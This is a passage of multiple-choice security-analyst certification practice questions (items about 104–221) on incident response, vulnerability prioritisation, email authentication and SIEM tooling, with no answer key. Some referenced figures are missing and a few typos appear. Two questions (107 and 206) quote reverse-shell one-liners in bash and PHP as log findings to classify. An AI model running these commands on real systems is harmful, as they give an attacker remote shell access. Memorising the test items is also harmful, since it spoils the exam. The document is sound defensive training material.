• B. The root cause analysis allows the incident to be properly documented for
reporting.
• C. The root cause analysis develops recommendations to improve the process.
• D. The root cause analysis identifies the contributing items that facilitated the
event.

105 - Which of the following concepts is using an API to insert bulk access requests from
a file into an identity management system an example of?

• A. Command and control

• B. Data enrichment
• C. Automation
 • D. Single sign-on

106 - A SOC analyst recommends adding a layer of defense for all endpoints that will
better protect against external threats regardless of the device’s operating system. Which
of the following best meets this requirement?

• A. SIEM
• B. CASB
• C. SOAR
• D. EDR

107 - A security analyst identified the following suspicious entry on the host-based IDS
logs:

bash -i >& /dev/tcp/[Link]/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if
the activity is ongoing?

• A. #!/bin/bash
nc [Link] 8080 -vv >dev/null && echo "Malicious activity" || echo "OK"
• B. #!/bin/bash
ps -fea | grep 8080 >dev/null && echo "Malicious activity" || echo "OK"
• C. #!/bin/bash
ls /opt/tcp/[Link]/8080 >dev/null && echo "Malicious activity" || echo "OK"
• D. #!/bin/bash
netstat -antp | grep 8080 >dev/null && echo "Malicious activity" || echo "OK"

108 - A company is concerned with finding sensitive file storage locations that are open
to the public. The current internal cloud network is flat. Which of the following is the best
solution to secure the network?

• A. Implement segmentation with ACLs.

• B. Configure logging and monitoring to the SIEM.
• C. Deploy MFA to cloud storage locations.
• D. Roll out an IDS.

109 - A security analyst is reviewing the findings of the latest vulnerability report for a
company’s web application. The web application accepts files for a Bash script to be
processed if the files match a given hash. The analyst is able to submit files to the
system due to a hash collision. Which of the following should the analyst suggest to
mitigate the vulnerability with the fewest changes to the current script and infrastructure?

• A. Deploy a WAF to the front of the application.

• B. Replace the current MD5 with SHA-256.
• C. Deploy an antivirus application on the hosting system.
• D. Replace the MD5 with digital signatures.
110. - A security analyst needs to mitigate a known, exploited vulnerability related to an
attack vector that embeds software through the USB interface. Which of the following
should the analyst do first?

• A. Conduct security awareness training on the risks of using unknown and

unencrypted USBs.
• B. Write a removable media policy that explains that USBs cannot be connected to
a company asset.
• C. Check configurations to determine whether USB ports are enabled on
company assets.
• D. Review logs to see whether this exploitable vulnerability has already impacted
the company.

111 - A systems administrator receives reports of an internet-accessible Linux server that

is running very sluggishly. The administrator examines the server, sees a high amount of
memory utilization, and suspects a DoS attack related to half-open TCP sessions
consuming memory. Which of the following tools would best help to prove whether this
server was experiencing this behavior?

• A. Nmap
• B. TCPDump
• C. SIEM
• D. EDR

112 - A security analyst is validating a particular finding that was reported in a web
application vulnerability scan to make sure it is not a false positive. The security analyst
uses the snippet below:

Which of the following vulnerability types is the security analyst validating?

• A. Directory traversal
• B. XSS
• C. XXE
• D. SSRF

113 - Which of the following is the most important factor to ensure accurate incident
response reporting?

• A. A well-defined timeline of the events

• B. A guideline for regulatory reporting
• C. Logs from the impacted system
 • D. A well-developed executive summary

114 - A security analyst is trying to detect connections to a suspicious IP address by

collecting the packet captures from the gateway. Which of the following commands
should the security analyst consider running?

• A. grep [IP address] [Link]

• B. cat [Link] | grep [IP Address]
• C. tcpdump -n -r [Link] host [IP address]
• D. strings [Link] | grep [IP Address]

115 - A security analyst reviews the latest vulnerability scans and observes there are
vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the
following attack vectors should the analyst remediate first?

• A. CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
• B. CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
• C. CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
• D. CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

116 - A security analyst must review a suspicious email to determine its legitimacy. Which
of the following should be performed? (Choose two.)

• A. Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint
Level
• B. Review the headers from the forwarded email
• C. Examine the recipient address field
• D. Review the Content-Type header
• E. Evaluate the HELO or EHLO string of the connecting email server
• F. Examine the SPF, DKIM, and DMARC fields from the original email

117 - A vulnerability analyst received a list of system vulnerabilities and needs to evaluate
the relevant impact of the exploits on the business. Given the constraints of the current
sprint, only three can be remediated. Which of the following represents the least
impactful risk, given the CVSS3.1 base scores?

• A. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0

• B. AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L - Base Score 7.2
• C. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4
• D. AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5

118 - A recent vulnerability scan resulted in an abnormally large number of critical and
high findings that require patching. The SLA requires that the findings be remediated
within a specific amount of time. Which of the following is the best approach to ensure all
vulnerabilities are patched in accordance with the SLA?
 • A. Integrate an IT service delivery ticketing system to track remediation and
closure
• B. Create a compensating control item until the system can be fully patched
• C. Accept the risk and decommission current assets as end of life
• D. Request an exception and manually patch each system

119 - Which of the following would help an analyst to quickly find out whether the IP
address in a SIEM alert is a known-malicious IP address?

• A. Join an information sharing and analysis center specific to the company's

industry
• B. Upload threat intelligence to the IPS in STIX'TAXII format
• C. Add data enrichment for IPs in the ingestion pipeline
• D. Review threat feeds after viewing the SIEM alert

120 - An organization was compromised, and the usernames and passwords of all
employees were leaked online. Which of the following best describes the remediation that
could reduce the impact of this situation?

• A. Multifactor authentication
• B. Password changes
• C. System hardening
• D. Password encryption

121 - A company is deploying new vulnerability scanning software to assess its systems.
The current network is highly segmented, and the networking team wants to minimize the
number of unique firewall rules. Which of the following scanning techniques would be
most efficient to achieve the objective?

• A. Deploy agents on all systems to perform the scans

• B. Deploy a central scanner and perform non-credentialed scans
• C. Deploy a cloud-based scanner and perform a network scan
• D. Deploy a scanner sensor on every segment and perform credentialed scans

122 - Executives at an organization email sensitive financial information to external

business partners when negotiating valuable contracts. To ensure the legal validity of
these messages, the cybersecurity team recommends a digital signature be added to
emails sent by the executives. Which of the following are the primary goals of this
recommendation? (Choose two.)

• A. Confidentiality
• B. Integrity
• C. Privacy
• D. Anonymity
• E. Non-reduplication
• F. Authorization
123 - A security administrator needs to import PII data records from the production
environment to the test environment for testing purposes. Which of the following would
best protect data confidentiality?

• A. Data masking
• B. Hashing
• C. Watermarking
• D. Encoding

124 - The email system administrator for an organization configured DKIM signing for all
email legitimately sent by the organization. Which of the following would most likely
indicate an email is malicious if the company's domain name is used as both the sender
and the recipient?

• A. The message fails a DMARC check

• B. The sending IP address is the hosting provider
• C. The signature does not meet corporate standards
• D. The sender and reply address are diferente

125 - During an incident involving phishing, a security analyst needs to find the source of
the malicious email. Which of the following techniques would provide the analyst with this
information?

• A. Header analysis
• B. Packet capture
• C. SSL inspection
• D. Reverse engineering

126 - An analyst wants to ensure that users only leverage web-based software that has
been pre-approved by the organization. Which of the following should be deployed?

• A. Blocklisting
• B. Allowlisting
• C. Graylisting
• D. Webhooks

127 - During a cybersecurity incident, one of the web servers at the perimeter network was
affected by ransomware. Which of the following actions should be performed
immediately?

• A. Shut down the server.

• B. Reimage the server.
• C. Quarantine the server.
• D. Update the OS to latest version.
128 - An organization recently changed its BC and DR plans. Which of the following would
best allow for the incident response team to test the changes without any impact to the
business?

• A. Perform a tabletop drill based on previously identified incident scenarios.

• B. Simulate an incident by shutting down power to the primary data center.
• C. Migrate active workloads from the primary data center to the secondary
location.
• D. Compare the current plan to lessons learned from previous incidents.

129 - Security analysts review logs on multiple servers on a daily basis. Which of the
following implementations will give the best central visibility into the events occurring
throughout the corporate environment without logging in to the servers individually?

• A. Deploy a database to aggregate the logging

• B. Configure the servers to forward logs to a SIEM
• C. Share the log directory on each server to allow local access.
• D. Automate the emailing of logs to the analysts.

130 - Following a recent security incident, the Chief Information Security Officer is
concerned with improving visibility and reporting of malicious actors in the environment.
The goal is to reduce the time to prevent lateral movement and potential data exfiltration.
Which of the following techniques will best achieve the improvement?

• A. Mean time to detect

• B. Mean time to respond
• C. Mean time to remediate
• D. Service-level agreement uptime

131 - After identifying a threat, a company has decided to implement a patch

management program to remediate vulnerabilities. Which of the following risk
management principles is the company exercising?

• A. Transfer
• B. Accept
• C. Mitigate
• D. Avoid

132 - A security analyst discovers an ongoing ransomware attack while investigating a

phishing email. The analyst downloads a copy of the file from the email and isolates the
affected workstation from the network. Which of the following activities should the
analyst perform next?

• A. Wipe the computer and reinstall software

• B. Shut down the email server and quarantine it from the network
• C. Acquire a bit-level image of the affected workstation
• D. Search for other mail users who have received the same file
133 - The security analyst received the monthly vulnerability report. The following findings
were included in the report:

• Five of the systems only required a reboot to finalize the patch application
• Two of the servers are running outdated operating systems and cannot be patched

The analyst determines that the only way to ensure these servers cannot be compromised
is to isolate them. Which of the following approaches will best minimize the risk of the
outdated servers being compromised?

• A. Compensating controls
• B. Due diligence
• C. Maintenance windows
• D. Passive Discovery

134 - The vulnerability analyst reviews threat intelligence regarding emerging

vulnerabilities affecting workstations that are used within the company:

Which of the following vulnerabilities should the analyst be most concerned about,
knowing that end users frequently click on malicious links sent via email?

• A. Vulnerability A
• B. Vulnerability B
• C. Vulnerability C
• D. Vulnerability D

135 - An incident response analyst is taking over an investigation from another analyst.
The investigation has been going on for the past few days. Which of the following steps is
most important during the transition between the two analysts?

• A. Identify and discuss the lessons learned with the prior analyst.
• B. Accept all findings and continue to investigate the next item target.
• C. Review the steps that the previous analyst followed.
• D. Validate the root cause from the prior analyst.
•
136 - A company recently removed administrator rights from all of its end user
workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the
vulnerabilities for the workstations and produces the following information:

Which of the following vulnerabilities should be prioritized for remediation?

• A. [Link]
• B. vote.4p
• C. [Link]
• D. [Link]

137 - A recent penetration test discovered that several employees were enticed to assist
attackers by visiting specific websites and running downloaded files when prompted by
phone calls. Which of the following would best address this issue?

• A. Increasing training and awareness for all staff

• B. Ensuring that malicious websites cannot be visited
• C. Blocking all scripts downloaded from the internet
• D. Disabling all staff members’ ability to run downloaded applications

138 - A security analyst at a company is reviewing an alert from the file integrity
monitoring indicating a mismatch in the login. html file hash. After comparing the code
with the previous version of the page source code, the analyst found the following code
snippet added:
Which of the following best describes the activity the analyst has observed?

• A. Obfuscated links
• B. Exfiltration
• C. Unauthorized changes
• D. Beaconing

139 - A security administrator has been notified by the IT operations department that
some vulnerability reports contain an incomplete list of findings. Which of the following
methods should be used to resolve this issue?

• A. Credentialed scar
• B. External scan
• C. Differential scan
• D. Network scan

140 - An organization enabled a SIEM rule to send an alert to a security analyst

distribution list when ten failed logins occur within one minute. However, the control was
unable to detect an attack with nine failed logins. Which of the following best represents
what occurred?

• A. False positive
• B. True negative
• C. False negative
• D. True positive

141 - A cybersecurity analyst is tasked with scanning a web application to understand

where the scan will go and whether there are URIs that should be denied access prior to
more in-depth scanning. Which of following best fits the type of scanning activity
requested?

A. Uncredentialed scan

B. Discovery scan

C. Vulnerability scan
 D. Credentialed scan

142 - Which of the following best describes the process of requiring remediation of a
known threat within a given time frame?

A. SLA

B. MOU

C. Best-effort patching

D. Organizational Governance

143 - Which of the following risk management principles is accomplished by purchasing

cyber insurance?

A. Accept

B. Avoid

C. Mitigate

D. Transfer

144 - A recent audit of the vulnerability management program outlined the finding for
increased awareness of secure coding practices. Which of the following would be best to
address the finding?

A. Establish quarterly SDLC training on the top vulnerabilities for developers

B. Conduct a yearly inspection of the code repositories and provide the report to
management.

C. Hire an external penetration test of the network

D. Deploy more vulnerability scanners for increased coverage

145 - An organization has deployed a cloud-based storage system for shared data that is
in phase two of the data life cycle. Which of the following controls should the security
team ensure are addressed? (Choose two.)

A. Data classification

B. Data destruction

C. Data loss prevention

D. Encryption
 E. Backups

F. Access controls

146 - An analyst is conducting routine vulnerability assessments on the company

infrastructure. When performing these scans, a business-critical server crashes, and the
cause is traced back to the vulnerability scanner. Which of the following is the cause of
this issue?

A. The scanner is running without an agent installed.

B. The scanner is running in active mode.

C. The scanner is segmented improperly

D. The scanner is configured with a scanning window

147 - An organization's threat intelligence team notes a recent trend in adversary privilege
escalation procedures. Multiple threat groups have been observed utilizing native
Windows tools to bypass system controls and execute commands with privileged
credentials. Which of the following controls would be most effective to reduce the rate of
success of such attempts?

A. Set user account control protection to the most restrictive level on all devices

B. Implement MFA requirements for all internal resources

C. Harden systems by disabling or removing unnecessary services

D. Implement controls to block execution of untrusted applications

148 - A new zero-day vulnerability was released. A security analyst is prioritizing which
systems should receive deployment of compensating controls deployment first. The
systems have been grouped into the categories shown below:

Which of the following groups should be prioritized for compensating controls?

A. Group A
 B. Group B

C. Group C

D. Group D

149 - A Chief Information Security Officer wants to map all the attack vectors that the
company faces each day. Which of the following recommendations should the company
align their security controls around?

A. OSSTMM

B. Diamond Model of Intrusion Analysis

C. OWASP

D. MITRE ATT&CK

150 - Which of the following actions would an analyst most likely perform after an
incident has been investigated?

A. Risk assessment

B. Root cause analysis

C. Incident response plan

D. Tabletop exercise

151 - After completing a review of network activity, the threat hunting team discovers a
device on the network that sends an outbound email via a mail client to a non-company
email address daily at 10:00 p.m. Which of the following is potentially occurring?

A. Irregular peer-to-peer communication

B. Rogue device on the network

C. Abnormal OS process behavior

D. Data exfiltration

152 - A vulnerability scanner generates the following output:

The company has an SLA for patching that requires time frames to be met for high-risk
vulnerabilities. Which of the following should the analyst prioritize first for remediation?

A. Oracle JDK

B. Cisco Webex

C. Redis Server

D. SSL Self-signed Certificate

153 - A web application team notifies a SOC analyst that there are thousands of
HTTP/404 events on the public-facing web server. Which of the following is the next step
for the analyst to take?

A. Instruct the firewall engineer that a rule needs to be added to block this external
server

B. Escalate the event to an incident and notify the SOC manager of the activity

C. Notify the incident response team that there is a DDoS attack occurring

D. Identify the IP/hostname for the requests and look at the related activity

154 - Which of the following best describes the reporting metric that should be utilized
when measuring the degree to which a system application, or user base is affected by an
uptime availability outage?

A. Timeline

B. Evidence

C. Impact

D. Scope

155 - A security analyst needs to provide evidence of regular vulnerability scanning on the
company's network for an auditing process. Which of the following is an example of a tool
that can produce such evidence?
 A. OpenVAS

B. Burp Suite

C. Nmap

D. Wireshark

156 - A security analyst performs a vulnerability scan. Based on the metrics from the scan
results, the analyst must prioritize which hosts to patch. The analyst runs the tool and
receives the following output:

Which of the following hosts should be patched first, based on the metrics?

A. host01

B. host02

C. host03

D. host04

157 - An organization receives a legal hold request from an attorney. The request pertains
to emails related to a disputed vendor contract. Which of the following is the best step for
the security team to take to ensure compliance with the request?

A. Publicly disclose the request to other vendors

 B. Notify the departments involved to preserve potentially relevant information

C. Establish a chain of custody starting with the attorney's request

D. Back up the mailboxes on the server and provide the attorney with a copy

158 - A company has the following security requirements:

• No public IPs
• All data secured at rest
• No insecure ports/protocols

After a cloud scan is completed a security analyst receives reports that several
misconfigurations are putting the company at risk. Given the following cloud scanner
output:

Which of the following should the analyst recommend be updated first to meet the
security requirements and reduce risks?

A. VM_PRD_DB

B. VM_DEV_DB

C. VM_DEV_Web02

D. VM_PRD_Web01

159 - Which of the following best describes the actions taken by an organization after the
resolution of an incident that addresses issues and reflects on the growth opportunities
for future incidents?

A. Lessons learned

B. Scrum review

C. Root cause analysis

D. Regulatory compliance
160 - An analyst is becoming overwhelmed with the number of events that need to be
investigated for a timeline. Which of the following should the analyst focus on in order to
move the incident forward?

A. Impact

B. Vulnerability score

C. Mean time to detect

D. Isolation

161 - To minimize the impact of a security incident, a cybersecurity analyst has

configured audit settings in the organization’s cloud services. Which of the following
security controls has the analyst configured?

A. Preventive

B. Corrective

C. Directive

D. Detective

162 - A web developer reports the following error that appeared on a development server
when testing a new application:

Which of the following tools can be used to identify the application’s point of failure?

A. OpenVAS

B. Angry IP scanner

C. Immunity debugger

D. Burp Suite
163 - Which of the following describes a contract that is used to define the various levels
of maintenance to be provided by an external business vendor in a secure environment?

A. MOU

B. NDA

C. BIA

D. SLA

164 - A security team is concerned about recent Layer 4 DDoS attacks against the
company website. Which of the following controls would best mitigate the attacks?

A. Block the attacks using firewall rules

B. Deploy an IPS in the perimeter network

C. Roll out a CDN

D. Implement a load balancer

165 - An analyst is reviewing system logs while threat hunting:

Which of the following hosts should be investigated first?

A. PC1

B. PC2

C. PC3

D. PC4

E. PC5
166 - An organization needs to bring in data collection and aggregation from various
endpoints. Which of the following is the best tool to deploy to help analysts gather this
data?

A. DLP

B. NAC

C. EDR

D. NIDS

167- A regulated organization experienced a security breach that exposed a list of

customer names with corresponding PII data. Which of the following is the best reason
for developing the organization's communication plans?

A. For the organization's public relations department to have a standard notification

B. To ensure incidents are immediately reported to a regulatory agency

C. To automate the notification to customers who were impacted by the breach

D. To have approval from executive leadership on when communication should occur

168 - Following an incident, a security analyst needs to create a script for downloading
the configuration of all assets from the cloud tenancy. Which of the following
authentication methods should the analyst use?

A. MFA

B. User and password

C. PAM

D. Key pair
169- A penetration tester is conducting a test on an organization's software development
website. The penetration tester sends the following request to the web interface:

Which of the following exploits is most likely being attempted?

A. SQL injection

B. Local file inclusion

C. Cross-site scripting

D. Directory traversal

170 - Two employees in the finance department installed a freeware application that
contained embedded malware. The network is robustly segmented based on areas of
responsibility. These computers had critical sensitive information stored locally that
needs to be recovered. The department manager advised all department employees to
turn off their computers until the security team could be contacted about the issue. Which
of the following is the first step the incident response staff members should take when
they arrive?

A. Turn on all systems, scan for infection, and back up data to a USB storage device.

B. Identify and remove the software installed on the impacted systems in the
department.

C. Explain that malware cannot truly be removed and then reimage the devices.
 D. Log on to the impacted systems with an administrator account that has privileges
to perform backups.

E. Segment the entire department from the network and review each computer
offline.

171 - A manufacturer has hired a third-party consultant to assess the security of an OT

network that includes both fragile and legacy equipment. Which of the following must be
considered to ensure the consultant does no harm to operations?

A. Employing Nmap Scripting Engine scanning techniques

B. Preserving the state of PLC ladder logic prior to scanning

C. Using passive instead of active vulnerability scans

D. Running scans during off-peak manufacturing hours

172 - A team of analysts is developing a new internal system that correlates information
from a variety of sources, analyzes that information, and then triggers notifications
according to company policy. Which of the following technologies was deployed?

A. SIEM

B. SOAR

C. IPS

D. CERT

173 - Which of following would best mitigate the effects of a new ransomware attack that
was not properly stopped by the company antivirus?

A. Install a firewall.

B. Implement vulnerability management.

C. Deploy sandboxing.

D. Update the application blocklist.

174 -A Chief Information Security Officer wants to implement security by design, starting
with the implementation of a security scanning method to identify vulnerabilities,
including SQL injection, RFI, XSS, etc. Which of the following would most likely meet the
requirement?

A. Reverse engineering

B. Known environment testing

C. Dynamic application security testing

D. Code debugging

175 - A security analyst scans a host and generates the following output:

Which of the following best describes the output?

A. The host is unresponsive to the ICMP request.

B. The host is running a vulnerable mail server.

C. The host is allowing unsecured FTP connections.

D. The host is vulnerable to web-based exploits.

176 - The security team at a company, which was a recent target of ransomware,
compiled a list of hosts that were identified as impacted and in scope for this incident.
Based on the following host list:
Which of the following systems was most pivotal to the threat actor in its distribution of
the encryption binary via Group Policy?

A. SQL01

B. WK10-Sales07

C. WK7-Plant01

D. DCEast01

E. HQAdmin9

177 - After a security assessment was done by a third-party consulting firm, the
cybersecurity program recommended integrating DLP and CASE to reduce analyst alert
fatigue. Which of the following is the best possible outcome that this effort hopes to
achieve?

A. SIEM ingestion logs are reduced by 20%.

B. Phishing alerts drop by 20%.

C. False positive rates drop to 20%.

D. The MTTR decreases by 20%.

178 - Which of the following threat actors is most likely to target a company due to its
questionable environmental policies?

A. Hacktivist

B. Organized crime

C. Nation-state

D. Lone Wolf

179 - A cybersecurity analyst is recording the following details:

• ID
• Name
• Description
• Classification of information
• Responsible party

In which of the following documents is the analyst recording this information?

A. Risk register
 B. Change control documentation

C. Incident response playbook

D. Incident response plan

180 - A SOC manager is establishing a reporting process to manage vulnerabilities. Which

of the following would be the best solution to identify potential loss incurred by an issue?

A. Trends

B. Risk score

C. Mitigation

D. Prioritization

181 - While configuring a SIEM for an organization, a security analyst is having difficulty
correlating incidents across different systems. Which of the following should be checked
first?

A. If appropriate logging levels are set

B. NTP configuration on each system

C. Behavioral correlation settings

D. Data normalization rules

182 - During a scan of a web server in the perimeter network, a vulnerability was identified
that could be exploited over port 3389. The web server is protected by a WAF. Which of
the following best represents the change to overall risk associated with this vulnerability?

A. The risk would not change because network firewalls are in use

B. The risk would decrease because RDP is blocked by the firewall

C. The risk would decrease because a web application firewall is in place

D. The risk would increase because the host is external facing

183 - Several vulnerability scan reports have indicated runtime errors as the code is
executing. The dashboard that lists the errors has a command-line interface for
developers to check for vulnerabilities. Which of the following will enable a developer to
correct this issue? (Choose two.)

A. Performing dynamic application security testing

B. Reviewing the code

C. Fuzzing the application

D. Debugging the code

E. Implementing a coding standard

F. Implementing IDS

184 - A security analyst is trying to validate the results of a web application scan with
Burp Suite. The security analyst performs the following:

Which of the following vulnerabilities is the security analyst trying to validate?

A. SQL injection

B. LFI

C. XSS

D. CSRF
185 - A cybersecurity team has witnessed numerous vulnerability events recently that
have affected operating systems. The team decides to implement host-based IPS,
firewalls and two-factor authentication. Which of the following does this most likely
describe?

A. System hardening

B. Hybrid network architecture

C. Continuous authorization

D. Secure access service edge

186 - A security analyst needs to secure digital evidence related to an incident. The
security analyst must ensure that the accuracy of the data cannot be repudiated. Which of
the following should be implemented?

A. Offline storage

B. Evidence collection

C. Integrity validation

D. Legal hold

187 - An analyst investigated a website and produced the following:

Which of the following syntaxes did the analyst use to discover the application versions
on this vulnerable website?

A. nmap -sS -T4 -F [Link]

B. nmap -C [Link]

C. nmap -sV -T4 -F [Link]

D. nmap -A [Link]
188 - A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps
between the firewall and the host under investigation are off by 43 minutes. Which of the
following is the most likely scenario occurring with the time stamps?

A. The NTP server is not configured on the host

B. The cybersecurity analyst is looking at the wrong information

C. The firewall is using UTC time

D. The host with the logs is offline

189 - A payroll department employee was the target of a phishing attack in which an
attacker impersonated a department director and requested that direct deposit
information be updated to a new account. Afterward, a deposit was made into the
unauthorized account. Which of the following is one of the first actions the incident
response team should take when they receive notification of the attack?

A. Scan the employee's computer with virus and malware tools

B. Review the actions taken by the employee and the email related to the event

C. Contact human resources and recommend the termination of the employee

D. Assign security awareness training to the employee involved in the incidente

190 - A security analyst has found the following suspicious DNS traffic while analyzing a
packet capture:

• DNS traffic while a tunneling session is active.

• The mean time between queries is less than one second.
• The average query length exceeds 100 characters.

Which of the following attacks most likely occurred?

A. DNS exfiltration

B. DNS spoofing

C. DNS zone transfer

D. DNS poisoning
191 - A small company does not have enough staff to effectively segregate duties to
prevent error and fraud in payroll management. The Chief Information Security Officer
(CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the
following did the CISO implement?

A. Corrective controls

B. Compensating controls

C. Operational controls

D. Administrative controls

192 - During the log analysis phase, the following suspicious command is detected:

Which of the following is being attempted?

A. Buffer overflow

B. RCE

C. ICMP tunneling

D. Smurf attack

193 - An email hosting provider added a new data center with new public IP addresses.
Which of the following most likely needs to be updated to ensure emails from the new
data center do not get blocked by spam filters?

A. DKIM

B. SPF

C. SMTP

D. DMARC

194 - A laptop that is company owned and managed is suspected to have malware. The
company implemented centralized security logging. Which of the following log sources
will confirm the malware infection?

A. XDR logs

B. Firewall legs

C. IDS logs
 D. MFA logs

195 - Which of the following best describes the goal of a disaster recovery exercise as
preparation for possible incidents?

A. To provide metrics and test continuity controls

B. To verify the roles of the incident response team

C. To provide recommendations for handling vulnerabilities

D. To perform tests against implemented security controls

196 - A security analyst has prepared a vulnerability scan that contains all of the
company’s functional subnets. During the initial scan users reported that network printers
began to print pages that contained unreadable text and icons. Which of the following
should the analyst do to ensure this behavior does not occur during subsequent
vulnerability scans?

A. Perform non-credentialed scans

B. Ignore embedded web server ports

C. Create a tailored scan for the printer subnet

D. Increase the threshold length of the scan timeout

197 - A Chief Information Security Officer has outlined several requirements for a new
vulnerability scanning project:

• Must use minimal network bandwidth

• Must use minimal host resources
• Must provide accurate, near real-time updates
• Must not have any stored credentials in configuration on the scanner

Which of the following vulnerability scanning methods should be used to best meet these
requirements?

A. Internal

B. Agent

C. Active

D. Uncredentialed
198 - An employee is no longer able to log in to an account after updating a browser. The
employee usually has several tabs open in the browser. Which of the following attacks
was most likely performed?

A. RFI

B. LFI

C. CSRF

D. XSS

199 - Which of the following does "federation" most likely refer to within the context of
identity and access management?

A. Facilitating groups of users in a similar function or profile to system access that

requires elevated or conditional access

B. An authentication mechanism that allows a user to utilize one set of credentials

to access multiple domains

C. Utilizing a combination of what you know who you are, and what you have to grant
authentication to a user

D. Correlating one's identity with the attributes and associated applications the user
has access to

200 - The Chief Information Security Officer for an organization recently received approval
to install a new EDR solution. Following the installation, the number of alerts that require
remediation by an analyst has tripled. Which of the following should the organization
utilize to best centralize the workload for the internal security team? (Choose two.)

A. SOAR

B. SIEM

C. MSP

D. NGFW

E. XDR

F. DLP
201 - Which of the following best describes the threat concept in which an organization
works to ensure that all network users only open attachments from known sources?

A. Hacktivist threat

B. Advanced persistent threat

C. Unintentional insider threat

D. Nation-state threat

202 - A security analyst has received an incident case regarding malware spreading out of
control on a customer's network. The analyst is unsure how to respond. The configured
EDR has automatically obtained a sample of the malware and its signature. Which of the
following should the analyst perform next to determine the type of malware based on its
telemetry?

A. Cross-reference the signature with open-source threat intelligence.

B. Configure the EDR to perform a full scan.

C. Transfer the malware to a sandbox environment.

D. Log in to the affected systems and run netstat.

203 - A network analyst notices a long spike in traffic on port 1433 between two IP
addresses on opposite sides of a WAN connection. Which of the following is the most
likely cause?

A. A local red team member is enumerating the local RFC1918 segment to enumerate
hosts

B. A threat actor has a foothold on the network and is sending out control beacons

C. An administrator executed a new database replication process without notifying

the SOC

D. An insider threat actor is running Responder on the local segment, creating traffic
replication

204 - Which of the following is a useful tool for mapping, tracking, and mitigating
identified threats and vulnerabilities with the likelihood and impact of occurrence?

A. Risk register

B. Vulnerability assessment

C. Penetration test
 D. Compliance report

205 - Which of the following is often used to keep the number of alerts to a manageable
level when establishing a process to track and analyze violations?

A. Log retention

B. Log rotation

C. Maximum log size

D. Threshold value

206 - While reviewing web server logs, a security analyst discovers the following
suspicious line:

php -r ’$socket=fsockopen("[Link]", 1234); passthru ("/bin/sh -i <&3 >&3 2>&3");’

Which of the following is being attempted?

A. Remote file inclusion

B. Command injection

C. Server-side request forgery

D. Reverse shell

207 - Which of the following should be updated after a lessons-learned review?

A. Disaster recovery plan

B. Business continuity plan

C. Tabletop exercise

D. Incident response plan

208 - A software developer has been deploying web applications with common security
risks to include insufficient logging capabilities. Which of the following actions would be
most effective to reduce risks associated with the application development?

A. Perform static analyses using an integrated development environment

B. Deploy compensating controls into the environment

C. Implement server-side logging and automatic updates

 D. Conduct regular code reviews using OWASP best practices

209 - An analyst suspects cleartext passwords are being sent over the network. Which of
the following tools would best support the analyst's investigation?

A. OpenVAS

B. Angry IP Scanner

C. Wireshark

D. Maltego

210 - Using open-source intelligence gathered from technical forums, a threat actor
compiles and tests a malicious downloader to ensure it will not be detected by the victim
organization's endpoint security protections. Which of the following stages of the Cyber
Kill Chain best aligns with the threat actor's actions?

A. Delivery

B. Reconnaissance

C. Exploitation

D. Weaponization

211 - An organization would like to ensure its cloud infrastructure has a hardened
configuration. A requirement is to create a server image that can be deployed with a
secure template. Which of the following is the best resource to ensure secure
configuration?

A. CIS Benchmarks

B. PCI DSS

C. OWASP Top Ten

D. ISO 27001
212 - A security analyst reviews the following Arachni scan results for a web application
that stores PII data:

Which of the following should be remediated first?

A. SQL injection

B. RFI

C. XSS

D. Code injection

213 - Which of the following stakeholders are most likely to receive a vulnerability scan
report? (Choose two.)

• A. Executive management
• B. Law enforcement
• C. Marketing
• D. Legal
• E. Product owner
• F. Systems administration

214 - Which of the following techniques can help a SOC team to reduce the number of
alerts related to the internal security activities that the analysts have to triage?

• A. Enrich the SIEM-ingested data to include all data required for triage
• B. Schedule a task to disable alerting when vulnerability scans are executing
• C. Filter all alarms in the SIEM with low seventy
• D. Add a SOAR rule to drop irrelevant and duplicated notifications
215 - An analyst is evaluating a vulnerability management dashboard. The analyst sees
that a previously remediated vulnerability has reappeared on a database server. Which of
the following is the most likely cause?

• A. The finding is a false positive and should be ignored.

• B. A rollback had been executed on the instance.
• C. The vulnerability scanner was configured without credentials.
• D. The vulnerability management software needs to be updated.

216 - A company has decided to expose several systems to the internet. The systems are
currently available internally only. A security analyst is using a subset of CVSS3.1
exploitability metrics to prioritize the vulnerabilities that would be the most exploitable
when the systems are exposed to the internet. The systems and the vulnerabilities are
shown below:

Which of the following systems should be prioritized for patching?

• A. brown
• B. grey
• C. blane
• D. sullivan

217 - During an incident in which a user machine was compromised, an analyst recovered
a binary file that potentially caused the exploitation. Which of the following techniques
could be used for further analysis?

• A. Fuzzing
• B. Static analysis
• C. Sandboxing
• D. Packet capture
218 - A leader on the vulnerability management team is trying to reduce the team's
workload by automating some simple but time-consuming tasks. Which of the following
activities should the team leader consider first?

• A. Assigning a custom recommendation for each finding

• B. Analyzing false positives
• C. Rendering an additional executive report
• D. Regularly checking agent communication with the central console

219 - The Chief Information Security Officer (CISO) of a large management firm has
selected a cybersecurity framework that will help the organization demonstrate its
investment in tools and systems to protect its data. Which of the following did the CISO
most likely select?

• A. PCI DSS
• B. COBIT
• C. ISO 27001
• D. ITIL

220 - A high volume of failed RDP authentication attempts was logged on a critical server
within a one-hour period. All of the attempts originated from the same remote IP address
and made use of a single valid domain user account. Which of the following would be the
most effective mitigating control to reduce the rate of success of this brute-force attack?

• A. Enabling a user account lockout after a limited number of failed attempts

• B. Installing a third-party remote access tool and disabling RDP on all devices
• C. Implementing a firewall block for the remote system's IP address
• D. Increasing the verbosity of log-on event auditing on all devices

221 - An incident response analyst is investigating the root cause of a recent malware
outbreak. Initial binary analysis indicates that this malware disables host security
services and performs cleanup routines on its infected hosts, including deletion of initial
dropper and removal of event log entries and prefetch files from the host. Which of the
following data sources would most likely reveal evidence of the root cause? (Choose
two.)

